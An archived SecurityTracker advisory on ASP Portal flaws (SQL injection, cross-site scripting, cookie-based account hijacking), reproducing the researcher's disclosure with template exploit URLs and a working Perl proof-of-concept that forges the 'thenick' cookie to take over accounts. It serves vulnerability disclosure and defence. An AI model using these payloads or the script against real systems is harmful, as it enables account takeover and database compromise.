Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
ASP Portal Has Multiple Flaws That Let Remote Users Hijack Accounts, Inject SQL Commands, and Conduct Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1009050
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Feb 14 2004
|
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Description: Manuel Lopez reported several vulnerabilities in ASP Portal. A remote user can inject SQL commands and can hijack user accounts. A remote user can also conduct cross-site scripting attacks.
It is reported that a remote user can modify the value of their 'thenick' cookie to obtain access to a target user's account, including
an administrator's account. A demonstration account hijacking exploit is available in the Source Message.
The report also indicates
that the 'index.asp' script does not properly validate user-supplied input in the 'pageid' and 'downloadscat' variables. A remote
user can reportedly inject SQL commands to be executed by the database. Some demonstration exploit URLs are provided:
http://[target]/index.asp?inc=blog&pageid='[SqlQ
uery]
http://[target]/index.asp?inc=downloadssub&downloadscat='[SqlQuery]
It is also reported that a remote user can inject
SQL commands via the 'thenick' cookie.
It is also reported that the software does not filter HTML code from user-supplied input
before displaying information containing that input. A remote user can create a specially crafted URL that, when loaded by a target
user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running
the ASP Portal software and will run in the security context of that site. As a result, the code will be able to access the target
user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target
user via web form to the site, or take actions on the site acting as the target user.
Some demonstration exploit URLs are provided:
http://[target]/index.asp?inc='
>[XSS]
http://[target]/index.asp?inc=profile&searchtext='>[XSS]
http://[target]/index.asp?inc=forumread&article='>[XSS]
It
is also reported that a remote user with an account on the system can conduct cross-site scripting attacks by injecting HTML code
in place of the image URL ('photograph URL') on the 'details' page.
|
Impact: A remote user can hijack a target user's account.
A remote user can inject SQL commands to be executed by the database.
A remote
user can access the target user's cookies (including authentication cookies), if any, associated with the site running the ASP Portal
software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the
target user.
|
Solution: The vendor has reportedly issued a fixed version.
Also, the January patch is available at:
http://www.aspportal.net/downloadsviewer.asp?theurl=38
|
Vendor URL: www.aspportal.net/ (Links to External Site)
|
Cause: Authentication error, Input validation error
|
Underlying OS: Windows (Any)
|
Reported By: Manuel Lopez <mantra@gulo.org>
|
Message History:
None.
|
Source Message Contents
|
Date: Sat, 14 Feb 2004 06:21:11 +0100
From: Manuel L pez <mantra@gulo.org>
Subject: ASP Portal Multiple Vulnerabilities
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Title: ASP Portal Multiple Vulnerabilities
By: Manuel López
Software: Asp Portal
Vendor Description:
ASP Portal is a an ASP powered portal site which uses an Access database to
store all the site info. The
script also includes and easy to use Admin Interface, so you can change
everything you need to online,
which makes maintaing the site very easy.
Severity:
Moderately critical
Impact:
Disclosure of authentication information, Disclosure of user information,
Execution of arbitrary code via
network, Modification of user information, ID Spoofing.
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Description:
---- Cross-Site Scripting ----
This product is vulnerable to the Cross-Site Scripting vulnerability that
would allow attackers to inject
HTML and script codes into the pages and execute it on the client's browser.
http://localhost/index.asp?inc='>[XSS]
http://localhost/index.asp?inc=profile&searchtext='>[XSS]
http://localhost/index.asp?inc=forumread&article='>[XSS]
---- Image ScriptCode Injection ----
An attacker can inject arbitrary HTML or scriptcode instead of an Image in
"photograph URL" of user's
'details' page.
javascript:alert()
---- Sql Injection ----
Another problem of sanitation could lead an attacker to inject SQL code to
manipulate and disclose
various information from the database. The problem is in the fields 'pageid'
and 'downloadscat'.
http://localhost/index.asp?inc=blog&pageid='[SqlQuery]
http://localhost/index.asp?inc=downloadssub&downloadscat='[SqlQuery]
Also it is possible an Sql Injection in the cookie, in 'thenick' field.
GET http://localhost/index.asp HTTP/1.1
Cookie: thenick='[SqlQuery]
---- Cookie Account Hijack ----
It is possible to impersonate others by manipulating the 'thenick' parameter
in the cookie.
Modifying the cookie is possible to gain access to other account. This issue
can be exploited to gain an
administrative account with the service.
---- PROOF OF CONCEPT COOKIE ACCOUNT HIJACK ----
#!/usr/bin/perl -w
## PROOF OF CONCEPT COOKIE ACCOUNT HIJACK
## Example: Asp-POC.pl localhost portal/index.asp Admin respuesta.htm
use IO::Socket;
if (@ARGV < 4)
print "\n\n";
print " ____________________________________________________________ \n";
print "| |\n";
print "| PROOF OF CONCEPT COOKIE ACCOUNT HIJACK |\n";
print "| Usage:Asp-POC.pl [host] [directorio] [usuario] [fichero] |\n";
print "| |\n";
print "| By: Manuel López #IST |\n";
print "|____________________________________________________________|\n";
print "\n\n";
exit(1);
$host = $ARGV[0];
$directorio = $ARGV[1];
$usuario = $ARGV[2];
$fichero = $ARGV[3];
print "\n";
print "----- Conectando <----\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die "$socket error $!";
print "====> Conectado\n";
print "====> Enviando Datos\n";
$socket->print(<<taqui) or die "write: $!";
GET http://$host/$directorio HTTP/1.1
Cookie: thenick=$usuario
taqui
print "====> OK\n";
print "====> Generando $fichero ...\n";
open( Result, ">$fichero");
print Result while <$socket>;
close Result;
------------------------------------------------
Solution:
Vendor contacted.
The vulnerabilities have reportedly been fixed in the new version.
Download the January patch:
http://www.aspportal.net/downloadsviewer.asp?theurl=38 or buy the new
version.
---- Credits ----
Manuel López ( mantra@gulo.org ) #IST
Special Thank´s: -- Aklis -- gulo.org
Kein, Skool, TheChakal, vientoS, |RDR|, NSR500, ^SaRgE^ .. and all the #IST
staff.
Excuse me for speaking English so badly.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1
iD8DBQFALavflZD3/ZFHM4ERApRSAJ46rZRn3OlSXp/k2jXwCXT0S0RLywCgn08e
mx+V1tKxAMSzt7PTgVh2D2A=
=0oiR
-----END PGP SIGNATURE-----
|
|
Go to the Top of This SecurityTracker Archive Page
|
